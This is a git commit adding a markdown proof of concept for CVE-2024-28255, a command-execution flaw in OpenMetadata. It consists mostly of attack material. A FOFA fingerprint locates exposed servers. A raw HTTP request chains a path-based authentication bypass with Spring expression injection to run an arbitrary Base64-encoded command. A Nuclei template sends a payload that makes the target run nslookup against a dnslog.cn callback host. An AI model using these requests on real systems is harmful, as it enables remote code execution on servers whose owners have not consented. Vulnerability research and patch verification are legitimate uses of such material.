Create OpenMetadata命令执行(CVE-2024-28255).md

2024-04-14 19:22:08 +08:00 · 2024-04-14 19:22:08 +08:00 · 3bb0519b02
commit 3bb0519b02
parent bf0b3a2cd3
1 changed files with 53 additions and 0 deletions
--- a/OpenMetadata命令执行(CVE-2024-28255).md
+++ b/OpenMetadata命令执行(CVE-2024-28255).md
@ -0,0 +1,53 @@
+## OpenMetadata命令执行(CVE-2024-28255)
+
+## fofa
+```
+icon_hash="733091897"
+```
+
+## poc
+```
+GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22Base64编码命令%22))) HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Connection: close
+Accept-Encoding: gzip
+```
+
+![78d091e4fbeaf6007c6605c09ff4025d](https://github.com/wy876/POC/assets/139549762/977f9bcb-c7f7-4a73-9918-9c06844c1436)
+
+
+## nuclei POC
+```
+id: CVE-2024-28255
+
+info:
+  name: CVE-2024-28255
+  author: xiaoming
+  severity: high
+  description: OpenMetadata Command Execution
+  metadata:
+    max-request: 1
+    shodan-query: ""
+    verified: true
+
+http:
+- raw:
+  - |+
+    GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgdGVzdC5kbnNsb2cuY24=%22))) HTTP/1.1
+    Host: {{Hostname}}
+    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+    Connection: close
+    Accept-Encoding: gzip
+
+  redirects: true
+  matchers-condition: and
+  matchers:
+  - id: 1
+    type: word
+    part: body
+    words:
+    - "400"
+    - java.lang.ProcessImpl
+    condition: and
+```